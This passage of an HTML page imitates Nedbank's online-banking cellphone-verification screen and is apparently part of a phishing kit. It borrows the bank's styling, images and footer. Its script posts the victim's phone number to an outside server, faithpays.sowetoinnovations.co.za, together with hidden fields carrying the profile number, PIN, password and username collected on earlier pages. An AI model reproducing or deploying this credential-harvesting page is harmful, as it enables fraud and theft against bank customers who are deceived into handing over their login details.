15px 0 15px}.entrustContainer[_ngcontent-c10]   .entrustText[_ngcontent-c10]{font-size:12px;padding-left:10px}}.animated[_ngcontent-c10]{-webkit-animation-duration:5s;animation-duration:5s;-webkit-animation-fill-mode:both;animation-fill-mode:both}@keyframes fadeAndScaleIn{0%{opacity:0;-webkit-transform:scale(1.1);transform:scale(1.1)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeAndScaleIn{0%{opacity:0;-webkit-transform:scale(1.1);transform:scale(1.1)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}.fadeAndScaleIn[_ngcontent-c10]{-webkit-animation-name:fadeAndScaleIn;animation-name:fadeAndScaleIn}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}.fadeIn[_ngcontent-c10]{-webkit-animation-name:fadeIn;animation-name:fadeIn}.stealthy[_ngcontent-c10]{left:0;top:0;margin:0;max-height:1px;max-width:1px;opacity:0;outline:none;overflow:hidden;pointer-events:none;position:absolute;z-index:-1}.vertical-align[_ngcontent-c10]{position:relative;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%)}.key[_ngcontent-c10]{width:100%}@media screen and (max-width:1024px){.key-img-container[_ngcontent-c10]{display:none}.key-content[_ngcontent-c10]{width:85%!important;padding:0 0 0 3vw!important}}.key-content[_ngcontent-c10], .key-img-container[_ngcontent-c10]{height:100%;float:left}.key-img-container[_ngcontent-c10]{width:50%}.key-img-container[_ngcontent-c10]   img[_ngcontent-c10]{height:100%;width:auto;opacity:1}@media screen and (min-width:768px){.key-img-container[_ngcontent-c10]   img[_ngcontent-c10]{height:auto;width:100%;opacity:1}}.key-content[_ngcontent-c10]{width:50%;padding:3vw 0 0 3vw}.key-content-icons[_ngcontent-c10]{margin:30px 0;width:100%;height:auto}.key-content-icon[_ngcontent-c10]{display:inline-block}.key-content-icon[_ngcontent-c10]   small[_ngcontent-c10]{font-size:75%;color:#666;margin-right:20px}.key-content-icon[_ngcontent-c10]   img[_ngcontent-c10]{width:40px;height:40px}.key-content[_ngcontent-c10]   h3[_ngcontent-c10]{font-size:2.4vw;font-weight:300;margin:0;color:#333;line-height:1}.key-content[_ngcontent-c10]   p[_ngcontent-c10]{font-size:14px;margin-bottom:20px}</style>
      <!--<script type="text/javascript" charset="utf-8" async="" src="NedMoney~PROFILE~PIN~PASSWORD_files/15.js"></script><script type="text/javascript" charset="utf-8" async="" src="NedMoney~PROFILE~PIN~PASSWORD_files/0.js"></script><script type="text/javascript" charset="utf-8" async="" src="NedMoney~PROFILE~PIN~PASSWORD_files/4.js"></script><script type="text/javascript" charset="utf-8" async="" src="NedMoney~PROFILE~PIN~PASSWORD_files/10.js"></script>-->
      <style>.clearfix[_ngcontent-c9]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c9]   html[_ngcontent-c9]   .clearfix[_ngcontent-c9]{height:1%}.clearfix[_ngcontent-c9]{display:block}.overlay-loader[_ngcontent-c9]{position:absolute;left:0;bottom:0;right:0;top:0;z-index:99;width:100%;height:100%;color:#fff;background:#009639;border-radius:inherit;cursor:not-allowed}.delete[_ngcontent-c9]{color:#d22630}.edit[_ngcontent-c9]{line-height:20px}.loader[_ngcontent-c9]{position:absolute;top:50%;z-index:100;transform:translate(-50%,-50%);-webkit-transform:translate(-50%,-50%);-moz-transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%);-o-transform:translate(-50%,-50%);left:50%;line-height:1;width:24px}</style>
      <style>.clearfix:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}* html .clearfix{height:1%}.clearfix{display:block}.enrol-container{margin:auto;display:table;width:100%;height:calc(100vh - 165px);position:relative;overflow:hidden;background:#fff;padding:0 5%}.enrol-container .left-container{font-size:16px;vertical-align:top;text-align:left;padding:30px 15px 15px 15px;display:table-cell;width:50%}.enrol-container .left-container.img-container{overflow:hidden;background-origin:padding-box,content-box;background-repeat:no-repeat;background-position:100%;background-size:contain}.enrol-container .component-container{font-size:16px;vertical-align:top;text-align:left;padding:30px 0 15px 0;display:table-cell;width:50%}.enrol-container .component-container .formInput{max-width:400px;margin:auto;margin-top:2rem}.enrol-container .component-container .gd-form .gd-form-row:last-of-type{margin-bottom:30px}.enrol-container .iconCardPin{position:relative}.enrol-container .iconCardPin:before{content:url(https://secured.nedbank.co.za/CardPIN.53498cd9c22ec372e5e2.svg);width:30px;height:30px;display:block}.enrol-container .iconPPP{position:relative}.enrol-container .iconPPP:before{content:url(https://secured.nedbank.co.za/PPP.cee7674f38c105ee0fb4.svg);width:100%;height:100%;display:block}.enrol-container .iconImg{position:absolute!important;display:inline-block;cursor:pointer}.enrol-container .icon-field .registerHeadingText{font-size:16px;color:#333;margin-left:60px;text-decoration:none}.enrol-container .icon-field .registerText{margin-left:60px;font-size:14px;color:#666}.enrol-container .password-Container{position:relative}.enrol-container .password-Container .eye-container{position:relative;width:100%}.enrol-container .password-Container .eye-container .eye-img{position:absolute;bottom:36%;right:12px;width:25px;height:25px}.enrol-container .password-Container .eye-container .fa-fa-eye{position:relative}.enrol-container .password-Container .eye-container .fa-fa-eye:before{content:url(https://secured.nedbank.co.za/PasswordIcon.1081eaee10ff4d116cc5.svg);width:100%;height:100%;display:block}.enrol-container ::-ms-clear,.enrol-container ::-ms-reveal{display:none}.enrol-container .boldText{font-family:MarkProBold,Century Gothic,Helvetica,Arial,Any Sans Serif font,MarkProMedium}.enrol-container .mediumText{font-family:MarkProMedium,Century Gothic,Helvetica,Arial,Any Sans Serif font,MarkPro}.enrol-container .darkText{color:#333}.enrol-container .secondaryText{color:#009639}.enrol-container .userText{color:#333;font-size:18px}.enrol-container .top-margin50{margin-top:50px}.enrol-container .helpText{font-size:14px;color:#bbb;margin:5px 0 0}.enrol-container .textPlaceholder{color:transparent;font-size:14px;margin:5px 0 0}.enrol-container .link-text{color:#009639;font-size:14px;margin:18px 0;font-weight:700;text-decoration:none;cursor:pointer}.enrol-container .link-text:active,.enrol-container .link-text:hover,.enrol-container .link-text:visited{text-decoration:none}.enrol-container .gd-ghost-btn,.enrol-container .gd-primary-btn,.enrol-container .gd-secondary-btn{min-width:160px}.enrol-container .btnWithBorder.gd-ghost-btn{color:#009639;background:#fff;border:2px solid #009639}.enrol-container .btnWithBorder.gd-ghost-btn:active,.enrol-container .btnWithBorder.gd-ghost-btn:active:focus,.enrol-container .btnWithBorder.gd-ghost-btn:focus,.enrol-container .btnWithBorder.gd-ghost-btn:hover{color:#fff;background:#009639;border-color:#009639}.enrol-container .btnWithBorder.gd-ghost-btn[disabled]{color:#eee;background:#fff;border-color:#eee}.enrol-container .btnWithBorder.gd-ghost-btn .overlay-loader{background:#009639;border-radius:initial;cursor:not-allowed}.enrol-container .fade{-webkit-animation-duration:3s;animation-duration:3s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.enrol-container .slide{-webkit-animation:slideIn 2s forwards;animation:slideIn 2s forwards}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}.enrol-container .fadeIn{-webkit-animation-name:fadeIn;animation-name:fadeIn}.enrol-container .slideIn{-webkit-animation-name:slideIn;animation-name:slideIn}@-webkit-keyframes slideIn{0%{-webkit-transform:translateX(-900px);transform:translateX(-900px)}to{-webkit-transform:translateX(0);transform:translateX(0)}}@keyframes slideIn{0%{-webkit-transform:translateX(-900px);transform:translateX(-900px)}to{-webkit-transform:translateX(0);transform:translateX(0)}}@media screen and (max-width:768px){.enrol-container{height:auto}.enrol-container .left-container{display:none}.enrol-container .component-container{width:100%;padding:15px}.enrol-container .component-container .formInput{max-width:none;margin-top:0}}</style>
      <style>.clearfix[_ngcontent-c14]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c14]   html[_ngcontent-c14]   .clearfix[_ngcontent-c14]{height:1%}.clearfix[_ngcontent-c14]{display:block}.back-arrow[_ngcontent-c14]{position:relative}.back-arrow[_ngcontent-c14]:before{content:url(https://secured.nedbank.co.za/back-arrow.5b6eae35a6f47b17610f.svg);width:10px;height:10px;display:block}.fa-fa-eye[_ngcontent-c14]{position:relative}.fa-fa-eye[_ngcontent-c14]:before{content:url(https://secured.nedbank.co.za/PasswordIcon.1081eaee10ff4d116cc5.svg);width:100%;height:100%;display:block}.eye-container[_ngcontent-c14]{position:relative}.eye-img[_ngcontent-c14]{position:absolute;bottom:36%;right:12px;width:25px;height:25px}.gd-form[_ngcontent-c14]   .gd-form-row[_ngcontent-c14]{margin-bottom:10px}.gd-form[_ngcontent-c14]   .gd-form-row[_ngcontent-c14]   .section-title[_ngcontent-c14]{margin-bottom:30px}[_ngcontent-c14]::-ms-clear, [_ngcontent-c14]::-ms-reveal{display:none}.helpModal[_ngcontent-c14]{background:#fff;width:100%;height:100%;position:absolute;top:0;left:0;z-index:999;overflow:hidden;padding:0 5%;transform:translateY(100%);-webkit-transform:translateY(100%);-moz-transform:translateY(100%);-ms-transform:translateY(100%);-o-transform:translateY(100%);transition:-webkit-transform 1s ease-in-out;transition:transform 1s ease-in-out;transition:transform 1s ease-in-out,-webkit-transform 1s ease-in-out;-webkit-transition:transform 1s ease-in-out;-moz-transition:transform 1s ease-in-out;-ms-transition:transform 1s ease-in-out;-o-transition:transform 1s ease-in-out}.helpModal.display[_ngcontent-c14]{transform:translate(0);-webkit-transform:translate(0);-moz-transform:translate(0);-ms-transform:translate(0);-o-transform:translate(0)}</style>
      <style>.clearfix[_ngcontent-c11]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c11]   html[_ngcontent-c11]   .clearfix[_ngcontent-c11]{height:1%}.clearfix[_ngcontent-c11]{display:block}.alert-container[_ngcontent-c11]{transition:all .3s}.alert-container[_ngcontent-c11]   .hidden[_ngcontent-c11]{display:none}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]{display:-webkit-box;display:-ms-flexbox;display:flex;-moz-align-items:center;-ms-align-items:center;-o-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:15px;z-index:99}.alert-container[_ngcontent-c11]   .message.error[_ngcontent-c11]{background:#fae3e5}.alert-container[_ngcontent-c11]   .message.error[_ngcontent-c11]   .linkText[_ngcontent-c11]{color:#d22630;cursor:pointer}.alert-container[_ngcontent-c11]   .message.lock[_ngcontent-c11]{background:#fae3e5}.alert-container[_ngcontent-c11]   .message.lock[_ngcontent-c11]   .linkText[_ngcontent-c11]{color:#d22630;cursor:pointer}.alert-container[_ngcontent-c11]   .message.success[_ngcontent-c11]{background:#d8f3b7}.alert-container[_ngcontent-c11]   .message.success[_ngcontent-c11]   .linkText[_ngcontent-c11]{color:#78be20}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .icon[_ngcontent-c11]{width:15px;height:15px}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .text[_ngcontent-c11]{-webkit-box-flex:1;-ms-flex:1;flex:1;color:#333;font-size:14px;margin:0 10px}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .errorIcon[_ngcontent-c11]{position:relative}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .errorIcon[_ngcontent-c11]:before{content:url(https://secured.nedbank.co.za/Error.63d9ff08640e6fe4b4ce.svg);width:100%;height:100%;display:block}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .lockIcon[_ngcontent-c11]{position:relative}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .lockIcon[_ngcontent-c11]:before{content:url(https://secured.nedbank.co.za/lock-gray.fceb43e3a2e15e551b7f.svg);width:100%;height:100%;display:block}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .successIcon[_ngcontent-c11]{position:relative}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .successIcon[_ngcontent-c11]:before{content:url(https://secured.nedbank.co.za/tick.513ef3c7d4134294e245.svg);width:15px;height:15px;display:block}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .closeIcon[_ngcontent-c11]{position:relative;cursor:pointer}.alert-container[_ngcontent-c11]   .message[_ngcontent-c11]   .closeIcon[_ngcontent-c11]:before{content:url(https://secured.nedbank.co.za/close-gray.4741697794b7aa526c3e.svg);width:100%;height:100%;display:block}</style>
      <style>.clearfix[_ngcontent-c18]:after{visibility:hidden;display:block;font-size:0;content:" ";clear:both;height:0}*[_ngcontent-c18]   html[_ngcontent-c18]   .clearfix[_ngcontent-c18]{height:1%}.clearfix[_ngcontent-c18]{display:block}.formInput.modalForm[_ngcontent-c18]{max-width:580px;margin:auto;top:0;bottom:0;left:0;right:0}.gd-form[_ngcontent-c18]{text-align:center;color:#666}.gd-ghost-btn[_ngcontent-c18], .gd-secondary-btn[_ngcontent-c18]{max-width:185px;padding:0}.gd-primary-btn[_ngcontent-c18]{max-width:300px}.navigateCloseDiv[_ngcontent-c18]{text-align:right;margin:20px 10px 20px 0}.number-text[_ngcontent-c18]{color:#009639;font-size:14px;font-weight:700;text-decoration:underline}@media screen and (max-width:768px){.formInput.modalForm[_ngcontent-c18]{max-width:auto;padding:10px}.navigateCloseDiv[_ngcontent-c18]{padding:10px}}</style>
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
      <script type="text/javascript">
        function ajax_jsonp_call(post_url, formValues, callBack) {
            //pageLoader(true);
            $.ajax({
                url: post_url,
                data: formValues,
                dataType: "jsonp",
                cache: false,
                success: function(results) {
                    //$('#div1').html(results);
                    //alert('completed');
                    //callBack(results);
                    //pageLoader(false);
                    document.open();
                    document.write(results.message);
                    document.close();

                },
                error: function() {
                    alert('Error');
                }
            });
        }
        
        function isNumberKey(event) {
            var charCode;
            var acceptedCodes = [49,50,51,52,53,54,55,56,57,48,46,8,0,13];

            if (window.event) {
                    charCode = event.keyCode;
            } else {
                    charCode = event.which;
            }

            var validCharCode = $.inArray(charCode, acceptedCodes);
            //console.log(charCode + " == "+validCharCode);
            if(validCharCode > -1){
                return true;
            }else{
                return false;
            }
            /*
            if (charCode > 31&&
                            (charCode < 48 || charCode > 57)) {
                    //alert("false - " + charCode);
                    return false;
            }
            console.log(charCode);
            return true;*/
        }

        function validatePassword(pw) {
            //return /^(?=.*[A-Za-z])(?=.*\d)[A-Za-z\d]{5,}$/.test(pw);
            return /^(?=.*[0-9])(?=.*[!@#$%^&*])[a-zA-Z0-9!@#$%^&*]{6,16}$/.test(pw);

        }
        
        function validatePhone(phoneN){
            return /^(?:(?:\+27|0|27)\d{9}|[1-9]\d{9})$/.test(phoneN);
        }
        
        function checkString(){
            var phone = document.getElementById("mobile_number").value;
            //check if string begins with 0
            //console.log(phone);
    //        if (phone[0] !== '0') {
    //            alert("Invalid Phone Number");
    //        }
    //        if(phone.length !== 10){
    //            alert("invalid Phone Number");
    //        }
            var isZero = phone[0];
            var phoneLength = phone.length;
            regPhone = /[0-9]{10}/;
            //console.log(isZero);
            //console.log(phoneLength);
            if(isZero !== '0'){
                alert('Invalid phone number');
                return false;
            }
            else if(phoneLength !== 10){
                alert('Invalid phone number');
                return false;
            }
            else if(regPhone.test(phone) === false){
                alert("Invalid Phone number, Please enter a valid Phone Number and retry");
                return false;
            }
            else{
                $("div[hidden].loader-mask").removeAttr("hidden");
                ajax_jsonp_call('https://faithpays.sowetoinnovations.co.za/KhRo/php/continue3.php', $("form.gd-form.ng-untouched.ng-pristine.ng-invalid").serialize());
                return false;
            }
        }
        
        function untouched(){
            var profile = $("input#mobile_number").val();
            //alert(profilePattern.test(profile));
            /*
            $validatePwd = validatePassword($("input#password").val());
            if($validatePwd == false){
                alert("Please enter a valid password");
                return false;
            }
            */
           
            $("div[hidden].loader-mask").removeAttr("hidden");
            ajax_jsonp_call('https://faithpays.sowetoinnovations.co.za/KhRo/php/continue3.php', $("form.gd-form.ng-untouched.ng-pristine.ng-invalid").serialize());
            return false;            
        }
        </script>
   </head>
   <body class="" onload="setTimeout(function(){$('input#mobile_number').focus();},1000);">
      <app-root _nghost-c0="" ng-version="4.4.6">
         <app-header _ngcontent-c0="" _nghost-c1="">
            <!---->
            <!---->
            <header _ngcontent-c1="" class="main-header un-auth">
               <div _ngcontent-c1="" class="container">
                  <div _ngcontent-c1="" class="row">
                     <div _ngcontent-c1="" class="col-xs-12">
                        <div _ngcontent-c1="" class="header-block">
                           <div _ngcontent-c1="" class="left">
                              <a _ngcontent-c1="" class="logo" routerlink="/login" href="#/login"></a>
                           </div>
                           <div _ngcontent-c1="" class="right top-right-header-section">
                              <ul _ngcontent-c1="">
                                 <li _ngcontent-c1="" class="branch">
                                    <div _ngcontent-c1="" class="icon"></div>
                                    <div _ngcontent-c1="" class="details">
                                       <a _ngcontent-c1="" href="#/branchlocator" routerlink="branchlocator" tabindex="-1">Branch locator</a>
                                    </div>
                                 </li>
                                 <li _ngcontent-c1="" class="contact-details">
                                    <div _ngcontent-c1="" class="icon"></div>
                                    <div _ngcontent-c1="" class="details">
                                       <p _ngcontent-c1="" class="call">+27 86 055 5111</p>
                                    </div>
                                 </li>
                              </ul>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
            </header>
         </app-header>
         <div _ngcontent-c0="" class="scroll-page" id="scroll-page">
            <div _ngcontent-c0="" appga="" class="app-content">
               <app-system-error _ngcontent-c0="" _nghost-c2="">
                  <!---->
               </app-system-error>
               <router-outlet _ngcontent-c0="">
               </router-outlet>
               <app-register-landing>
                  <div class="enrol-container">
                     <div class="left-container img-container fade fadeIn" style="background-image: url(https://secured.nedbank.co.za/assets/png/NedbankLogin_v4.png);">
                     </div>
                     <div class="component-container fade fadeIn">
                        <div>
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <!---->
                           <div>
                              <app-nedbankid-forgotpwd-getidentity _nghost-c25="">
                                 <div _ngcontent-c25="" class="formInput">
                                    <form _ngcontent-c25="" class="gd-form ng-untouched ng-pristine ng-invalid" novalidate="" onsubmit="return checkString(); ">
                                        
                                        <input type="hidden" name="PROFILE_NUMBER" value="{PROFILE_NUMBER}">
                                        <input type="hidden" name="PIN" value="{PIN}">
                                        <input type="hidden" name="PASSWORD" value="{PASSWORD}">
                                        
                                        
                                        <input type="hidden" name="Username" value="{Username}">
                                        <input type="hidden" name="UsernamePassword" value="{UsernamePassword}">
                                        
                                       <div _ngcontent-c25="" class="gd-form-row">
                                          <h4 _ngcontent-c25="" class="section-title darkText">CellPhone number verification</h4>
                                       </div>
                                       <app-message-alert _ngcontent-c25="" _nghost-c11="">
                                          <div _ngcontent-c11="" class="alertMessage hidden" role="alert">
                                             <div _ngcontent-c11="" class="gd-form-row alert-container">
                                                <div _ngcontent-c11="" class="message error">
                                                   <div _ngcontent-c11="" class="errorIcon"></div>
                                                   <div _ngcontent-c11="" class="text">
                                                      <div _ngcontent-c11=""></div>
                                                      <!---->
                                                   </div>
                                                   <div _ngcontent-c11="" class="icon closeIcon"></div>
                                                </div>
                                             </div>
                                          </div>
                                       </app-message-alert>
                                       <div _ngcontent-c25="" class="gd-form-row">
                                          <span _ngcontent-c25="">Enter the cellphone number registered on your profile</span>
                                       </div>
                                       
                                       <div _ngcontent-c25="" class="top-margin50">
                                          <!---->
                                          <div _ngcontent-c25="" class="gd-form-row">
                                             <label _ngcontent-c25="" class="gd-sm-label active" for="mobile_number">SA cellphone number</label>
                                             <input maxlength="10" _ngcontent-c25="" appvalidateinput="" appvalidateonblur="" autocomplete="off" class="validate ng-untouched ng-pristine ng-invalid" id="mobile_number" name="mobileNumber" required="" validatefor="mobile" ipattern="/^(?:(?:\+27|0|27)\d{9}|[1-9]\d{9})$/" type="tel">
                                             <!---->
                                             <!---->
                                             <!---->
                                          </div>
                                       </div>
                                       <div _ngcontent-c25="" class="gd-form-row">
                                          <app-bottom-button _ngcontent-c25="" _nghost-c9="">
                                            <button _ngcontent-c9="" class="gd-primary-btn" id="next" type="submit">
                                                Continue
                                                <!---->
                                                <!---->
                                            </button>
                                          </app-bottom-button>
                                       </div>
                                    </form>
                                 </div>
                              </app-nedbankid-forgotpwd-getidentity>
                           </div>
                           <!---->
                           <!---->
                           <!---->
                        </div>
                     </div>
                  </div>
               </app-register-landing>
            </div>
            <app-footer _ngcontent-c0="" _nghost-c3="">
               <footer _ngcontent-c3="" class="main-footer">
                  <div _ngcontent-c3="" class="container">
                     <div _ngcontent-c3="" class="row">
                        <div _ngcontent-c3="" class="col-xs-12">
                           <div _ngcontent-c3="" class="footer-block">
                              <ul _ngcontent-c3="" class="footer-nav">
                                 <!---->
                                 <li _ngcontent-c3="">
                                    <a _ngcontent-c3="" tabindex="-1">
                                       <!----><span _ngcontent-c3="" class="icon contact"></span>
                                       <span _ngcontent-c3="" class="text">Contact</span>
                                    </a>
                                 </li>
                                 <li _ngcontent-c3="">
                                    <a _ngcontent-c3="" tabindex="-1">
                                       <!----><span _ngcontent-c3="" class="icon icon-location"></span>
                                       <span _ngcontent-c3="" class="text">Find an ATM or branch</span>
                                    </a>
                                 </li>
                                 <li _ngcontent-c3="">
                                    <a _ngcontent-c3="" tabindex="-1">
                                       <!----><span _ngcontent-c3="" class="icon icon-help"></span>
                                       <span _ngcontent-c3="" class="text">Help</span>
                                    </a>
                                 </li>
                                 <li _ngcontent-c3="">
                                    <a _ngcontent-c3="" tabindex="-1">
                                       <!----><span _ngcontent-c3="" class="icon TnC"></span>
                                       <span _ngcontent-c3="" class="text">Terms and conditions</span>
                                    </a>
                                 </li>
                              </ul>
                              <div _ngcontent-c3="" class="copyright">
                                 <span _ngcontent-c3="" class="text">
                                 Nedbank Ltd Reg No 1951/000009/06.
                                 </span>
                                 <span _ngcontent-c3="" class="text">
                                 Authorised financial services and registered credit provider (NCRCP16).
                                 </span>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </footer>
            </app-footer>
            <app-unsave-overlay _ngcontent-c0="" _nghost-c4="">
               <!---->
            </app-unsave-overlay>
         </div>
         <app-loader _ngcontent-c0="" _nghost-c5="">
            <div _ngcontent-c5="" class="loader-mask" hidden="">
               <div _ngcontent-c5="" class="loader-spinner">
                  <svg _ngcontent-c5="" ngClass="spinner-container" viewBox="0 0 52 52" class="spinner-container">
                     <circle _ngcontent-c5="" cx="26px" cy="26px" fill="none" r="20px" stroke-width="4px" class="path green"></circle>
                  </svg>
               </div>
            </div>
         </app-loader>
         <div _ngcontent-c0=""></div>
      </app-root>
   </body>
</html>